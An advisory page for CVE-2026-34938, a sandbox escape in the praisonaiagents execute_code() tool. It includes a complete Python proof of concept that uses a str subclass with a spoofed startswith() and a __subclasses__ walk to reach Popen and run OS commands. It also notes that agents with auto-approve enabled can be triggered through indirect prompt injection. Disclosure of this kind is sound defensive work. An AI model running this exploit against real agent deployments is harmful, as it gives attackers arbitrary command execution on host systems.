CVE-2026-34938

CRITICAL
2026-04-01 https://github.com/MervinPraison/PraisonAI GHSA-6vh2-h83c-9294
10.0
CVSS 3.1
Share

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Patch Released
Apr 02, 2026 - 14:30 nvd
Patch available
Analysis Generated
Apr 02, 2026 - 00:15 vuln.today
CVE Published
Apr 01, 2026 - 23:17 nvd
CRITICAL 10.0

Tags

Python Command Injection

Description

### Summary `execute_code()` in `praisonai-agents` runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a `str` subclass with an overridden `startswith()` method to the `_safe_getattr` wrapper, achieving arbitrary OS command execution on the host. ### Details `python_tools.py:20` (source) -> `python_tools.py:22` (guard bypass) -> `python_tools.py:161` (sink) ```python # source -- _safe_getattr accepts any str subclass def _safe_getattr(obj, name, *default): if isinstance(name, str) and name.startswith('_'): # isinstance passes for subclasses raise AttributeError(...) # hop -- type() is whitelisted in safe_builtins, creates str subclass without class keyword FakeStr = type('FakeStr', (str,), {'startswith': lambda self, *a: False}) # sink -- Popen reached via __subclasses__ walk r = Popen(['id'], stdout=PIPE, stderr=PIPE) ``` ### PoC ```python from praisonaiagents.tools.python_tools import execute_code payload = """ t = type FakeStr = t('FakeStr', (str,), {'startswith': lambda self, *a: False}) mro_attr = FakeStr(''.join(['_','_','m','r','o','_','_'])) subs_attr = FakeStr(''.join(['_','_','s','u','b','c','l','a','s','s','e','s','_','_'])) mod_attr = FakeStr(''.join(['_','_','m','o','d','u','l','e','_','_'])) name_attr = FakeStr(''.join(['_','_','n','a','m','e','_','_'])) PIPE = -1 obj_class = getattr(type(()), mro_attr)[1] for cls in getattr(obj_class, subs_attr)(): try: m = getattr(cls, mod_attr, '') n = getattr(cls, name_attr, '') if m == 'subprocess' and n == 'Popen': r = cls(['id'], stdout=PIPE, stderr=PIPE) out, err = r.communicate() print('RCE:', out.decode()) break except Exception as e: print('ERR:', e) """ result = execute_code(code=payload) print(result) # expected output: RCE: uid=1000(narey) gid=1000(narey) groups=1000(narey)... ``` ### Impact Any user or agent pipeline running `execute_code()` is exposed to full OS command execution as the process user. Deployments using `bot.py`, `autonomy_mode.py`, or `bots_cli.py` set `PRAISONAI_AUTO_APPROVE=true` by default, meaning no human confirmation is required and the tool fires silently when triggered via indirect prompt injection.

Analysis

Critical sandbox escape in praisonaiagents Python library allows remote unauthenticated attackers to execute arbitrary OS commands by exploiting a type-checking flaw in the _safe_getattr wrapper. The vulnerability affects pkg:pip/praisonaiagents and carries a maximum CVSS 10.0 score with network attack vector, no authentication required, and changed scope impact. …

Sign in for full analysis, threat intelligence, and remediation guidance.

Remediation

Within 24 hours: identify all systems running praisonaiagents via dependency scanning and immediately disable autonomous modes (set PRAISONAI_AUTO_APPROVE=false); require manual approval for all agent actions. Within 7 days: isolate affected praisonaiagents instances to air-gapped environments or disable entirely until patch availability confirmed; implement network-level restrictions on outbound connections from systems running this library. …

Sign in for detailed remediation steps.

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

Sign in - Free

Priority Score

50
Low Medium High Critical
KEV: 0
EPSS: +0.1
CVSS: +50
POC: 0

Share

CVE-2026-34938 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy